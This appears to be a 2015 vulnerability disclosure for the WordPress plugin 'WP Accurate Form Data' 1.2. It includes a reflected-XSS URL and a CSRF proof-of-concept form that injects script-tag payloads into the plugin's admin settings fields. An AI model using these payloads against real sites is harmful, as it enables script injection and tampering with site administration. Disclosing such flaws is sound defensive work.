Title: WordPress 'WP Accurate Form Data' Plugin 
Version: 1.2
Author: Morten Nørtoft, Kenneth Jepsen & Mikkel Vej
Date: 2015-06-21
Download: 
- https://wordpress.org/plugins/accurate-form-data-real-time-form-validation/
- https://plugins.svn.wordpress.org/accurate-form-data-real-time-form-validation/
Notified WordPress: 2015-06-21
==========================================================

## Plugin description
==========================================================
The plugin performs E-mail and Physical Address validations automatically for most wordpress contact forms.

## XSS Vulnerabilities
==========================================================
The request URI is echo'ed into the HTML page without sanitization. This can be exploited with a malicious URL (keep in mind that most modern browsers encode the url).

http://[URL]/wp-admin/options-general.php?page=Accu_Data_WP&a="><script>alert(1)</script>

----

The options on the admin settings page are displayed/stored without sanitization. This can be exploited with a crafted POST request.

PoC (using CSRF):

Log in as admin and submit the following form:

<form method="POST" action="http://[URL]/wp-admin/options-general.php?page=Accu_Data_WP"> 
 	<input type="text" name="wClientKey" value="&quot;><script>alert(1)</script>"><br />
 	<text>wCheckEmailValidity: </text>
 	<input type="text" name="wCheckEmailValidity" value=""><br />
 	<input type="text" name="wIncludeOpen" value=""><br />
 	<input type="text" name="wEmailBlockAttempts" value="&quot;><script>alert(4)</script>"><br />
 	<input type="text" name="wEmailFields" value="&quot;><script>alert(5)</script>"><br />
 	<input type="text" name="wCheckPhysicalAddressValidity" value=""><br />
 	<input type="text" name="wPhysicalAddressBlockAttempts" value="&quot;><script>alert(7)</script>"><br />
 	<input type="text" name="wCityFields" value="&quot;><script>alert(8)</script>"><br />
 	<input type="text" name="wZipFields" value="&quot;><script>alert(9)</script>"><br />
 	<input type="text" name="wAddressFields" value="&quot;><script>alert(10)</script>"><br />
 	<input type="text" name="wStateFields" value="&quot;><script>alert(11)</script>"><br />
 	<input type="text" name="wCountryFields" value="&quot;><script>alert(12)</script>"><br />
 	<text>wSub </text>
	<input type="text" name="wSub" value="Save Changes" readonly><br />
	<input type="submit">
</form>


## Solution
==========================================================
No fix available

==========================================================
XSS vulnerabilities found using Eir; an early stage static vulnerability scanner for PHP applications.